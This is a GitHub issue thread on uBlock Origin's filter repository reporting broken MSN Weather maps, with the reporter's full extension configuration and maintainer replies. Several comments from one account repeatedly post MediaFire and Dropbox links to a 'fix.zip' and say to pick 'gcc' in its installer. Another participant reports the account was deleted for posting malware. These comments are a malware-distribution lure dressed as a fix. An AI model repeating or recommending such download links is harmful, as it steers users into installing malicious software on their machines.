### ISSUE TITLE
weather.msn.com: breakage

### ISSUE THREAD

**Issue by a1challenged** [uBlockOrigin/uAssets#25044]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.msn.com/en-us/weather/maps/wind/in-Saint-Marys,IA?loc=eyJsIjoiU2FpbnQgTWFyeXMiLCJyIjoiSUEiLCJjIjoiVW5pdGVkIFN0YXRlcyIsImkiOiJVUyIsImciOiJlbi11cyIsIngiOiItOTUuODQ0NzI2NTYiLCJ5IjoiNDEuMTQ3NjM3OTkifQ%3D%3D&weadegreetype=F&ocid=ansmsnweather&cvid=ec8cf237b3d44c4eb24e8327cdec0b6f`

### Category

breakage

### Description

Website for MSN Weather Maps is not showing correctly. The maps are missing the data and the background which is earth. Doesn't matter which map you click on it has no data, just a black background.

### Other extensions used

Adblock Plus, and numerous others have no effect on what is on the site.

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium: 128
filterset (summary):
 network: 163809
 cosmetic: 173275
 scriptlet: 36820
 html: 0
listset (total-discarded, last-updated):
 added:
  adguard-cookies: 31140-94, now
  ublock-cookies-adguard: 1655-9, now
  fanboy-cookiemonster: 51736-4031, now
  ublock-cookies-easylist: 1655-1655, now
  adguard-popup-overlays: 27874-907, now
  adguard-mobile-app-banners: 5422-10, now
  adguard-other-annoyances: 14911-385, now
  adguard-widgets: 2649-19, now
  easylist-annoyances: 4736-52, now
  easylist-chat: 206-0, now
  easylist-newsletters: 7716-24, now
  easylist-notifications: 3482-1190, now
  [1 lists not shown]: [too many]
 default:
  user-filters: 2-0, never
  ublock-filters: 39595-603, 1h.27m Δ
  ublock-badware: 10668-6, 1h.27m Δ
  ublock-privacy: 1071-2, 1h.27m Δ
  ublock-unbreak: 2497-0, 1h.27m Δ
  ublock-quick-fixes: 188-0, 1h.27m Δ
  easylist: 85537-647, 1h.27m Δ
  easyprivacy: 53073-774, 1h.27m Δ
  urlhaus-1: 29165-0, now
  plowe-0: 3545-0, now
filterset (user): [array of 1 redacted]
trustedset:
 added: [array of 1 redacted]
switchRuleset:
 added: [array of 1 redacted]
userSettings:
 prefetchingDisabled: false
hiddenSettings: [none]
supportStats:
 allReadyAfter: 5430 ms (selfie)
 maxAssetCacheWait: 562 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 32
 no-cosmetic-filtering: true
 network:
  msn.com: 26
  adnxs.com: 5
  btloader.com: 1
 extended:
  ##.feedback_link_default-DS-EntryPoint1-1
  ##div[class^="newsContainer-"]
  ##display-ads
  ##body:style(overflow: initial!important;)
  ##+js(json-prune-fetch-response, properties.componentConfigs.sli…
  ##+js(json-prune-fetch-response, *, list.*.link.ad list.*.link.k…
  ##+js(remove-cookie, MicrosoftApplicationsTelemetryDeviceId)
  ##+js(remove-class, irisbactive-top, body)
```
</details>

**Comment by stephenhawk8054** [comment]
Test again in a new browser profile with only uBO and its default settings.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by stephenhawk8054** [comment]
@gorhill @gwarser @uBlock-user Sorry, do you know how to ban @swaggy111 ? They are commenting downloading links constantly now. I'm not familiar with github admin function.

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by stephenhawk8054** [comment]
Similar case: https://github.com/uBlockOrigin/uAssets/issues/25045

**Comment by jeffhammond** [comment]
You report the comment and GitHub support will take action. I reported the user for posting malware and the account  was deleted immediately.
